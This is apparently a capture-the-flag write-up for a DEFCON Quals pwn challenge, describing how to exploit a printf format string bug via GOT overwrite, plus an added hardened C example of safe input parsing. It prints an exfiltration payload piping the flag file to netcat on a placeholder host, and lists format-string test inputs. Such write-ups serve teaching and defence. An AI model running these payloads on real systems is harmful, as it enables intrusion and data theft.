wibbly wobbly timey wimey

DEFCON QUALS CTF PWN Challenge: 2pts

Challenge Description:

"Don't blink!"
"wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me:2606"
The challenge binary was a game that had to be solved multiple times to reach the special "TARDIS CONSOLE". Once you made it that far, you could work your way through the console to a printf() call that was passed user-specified coordinates. That call has a format string vulnerability, which could be exploited to get a shell.

Material:

Solution:

Find a way to exploit the format string vulnerability, leak text and libc addresses, then execute user input as bash commands.
(The Python script that gets system("cat flag| nc <..IP..> <..PORT..>") executed on the server, and the server binary to pwn, are linked at the bottom.)

            1) Write a Python script to repeatedly solve the game for you.

            2) Enter the special key "UeSlhCAGEp". This can be found by reversing the binary to see what your input is compared against.

            3) This gets you to the TARDIS CONSOLE where all the interesting stuff is.

            4) Looking closer at the binary, we realize that a special option of the console will get us to the format string vuln. Now we need to get there.

            5) Opening it again in IDA, we realize that when choosing a console option (a 1 or a 2), 8 bytes are accepted but only 1 is used.

            6) Use this to get to the hidden option (3) containing the "printf()".

            7) Once we get to the printf, we can pretty much do whatever we want, as it takes user input directly!

            8) First we leak text addresses, then libc addresses, to calculate the address of "system()", which we use to overwrite the "printf()" entry in the GOT.

            9) Calling the 3rd option again with our coordinates, we pass the payload (cat flag | nc IP PORT) to "printf()" which is now really "system()".

            10) Listen on an open port using netcat, and get the flag!
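
A hardened version of the two input paths the steps above rely on: the console menu read that accepts 8 bytes but uses 1, and the coordinates that reach printf() as its format string. This is an added example, not code from the challenge binary; the function names and the "x,y" decimal coordinate syntax are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened console handlers; names and "x,y" syntax are assumed. */

/* Menu choice: exactly one digit in [lo, hi], optional '\n', nothing else.
 * Returns the option number, or -1 if any extra bytes follow the digit. */
int parse_choice(const char *buf, size_t len, int lo, int hi)
{
    if (len > 0 && buf[len - 1] == '\n')
        len--;
    if (len != 1 || buf[0] < '0' + lo || buf[0] > '0' + hi)
        return -1;
    return buf[0] - '0';
}

/* Coordinates: two decimal numbers "x,y" (newline already stripped).
 * The whitelist rejects '%', letters and whitespace before strtod runs. */
int parse_coords(const char *s, double *x, double *y)
{
    char *end;
    if (strspn(s, "0123456789.,+-") != strlen(s))
        return -1;
    *x = strtod(s, &end);
    if (end == s || *end != ',')
        return -1;
    s = end + 1;
    *y = strtod(s, &end);
    if (end == s || *end != '\0')
        return -1;
    return 0;
}

/* The vulnerable pattern is snprintf(out, n, user): the user's bytes become
 * the format string. Here the format is a constant and only the parsed
 * numbers are printed. Returns -1 if the input was rejected. */
int render_coords(char *out, size_t n, const char *user)
{
    double x, y;
    if (parse_coords(user, &x, &y) != 0)
        return -1;
    return snprintf(out, n, "Coordinates: %.6f, %.6f", x, y);
}

int main(void)
{
    char out[64];
    const char *samples[] = { "51.5,-0.25", "%x.%x.%x", "1,2%n" }; /* constructed */
    for (size_t i = 0; i < 3; i++)
        puts(render_coords(out, sizeof out, samples[i]) < 0 ? "rejected" : out);
    printf("choice: %d\n", parse_choice("1AAAAAAA", 8, 1, 2));
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler flag any remaining call whose format argument is not a string literal.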

Detailed steps to flag:

Flag:

Binaries & Scripts:

SERVER (TARDIS GAME)

CLIENT (SOL SCRIPT)